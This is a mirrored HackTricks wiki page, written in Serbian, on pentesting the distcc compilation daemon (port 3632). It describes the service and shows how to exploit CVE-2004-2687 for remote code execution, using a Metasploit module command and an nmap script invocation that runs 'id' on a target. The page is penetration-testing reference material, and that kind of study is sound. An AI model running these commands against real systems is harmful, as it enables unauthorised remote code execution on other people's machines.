maride/hacktricks
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks.git synced 2025-10-10 18:36:50 +00:00
Code Issues Packages Projects Releases Wiki Activity
hacktricks/src/network-services-pentesting/3632-pentesting-distcc.md

31 lines
1.2 KiB
Markdown
Raw Blame History

{{#include ../banners/hacktricks-training.md}}
# Osnovne informacije
**Distcc** je alat koji poboljšava **proces kompajliranja** koristeći **neiskorišćenu procesorsku snagu** drugih računara u mreži. Kada je **distcc** postavljen na mašini, ova mašina može da distribuira svoje **zadace kompajliranja** drugom sistemu. Ovaj prijemni sistem mora da pokreće **distccd daemon** i mora imati instaliran **kompatibilan kompajler** da bi obradio poslati kod.
**Podrazumevani port:** 3632
```
PORT STATE SERVICE
3632/tcp open distccd
```
# Eksploatacija
Proverite da li je ranjiv na **CVE-2004-2687** za izvršavanje proizvoljnog koda:
```bash
msf5 > use exploit/unix/misc/distcc_exec
nmap -p 3632 <ip> --script distcc-cve2004-2687 --script-args="distcc-exec.cmd='id'"
```
# Shodan
_Ne mislim da shodan detektuje ovu uslugu._
# Resources
- [https://www.rapid7.com/db/modules/exploit/unix/misc/distcc_exec](https://www.rapid7.com/db/modules/exploit/unix/misc/distcc_exec)
- [https://gist.github.com/DarkCoderSc/4dbf6229a93e75c3bdf6b467e67a9855](https://gist.github.com/DarkCoderSc/4dbf6229a93e75c3bdf6b467e67a9855)
Post created by **Álex B (@r1p)**
{{#include ../banners/hacktricks-training.md}}
Reference in New Issue View Git Blame Copy Permalink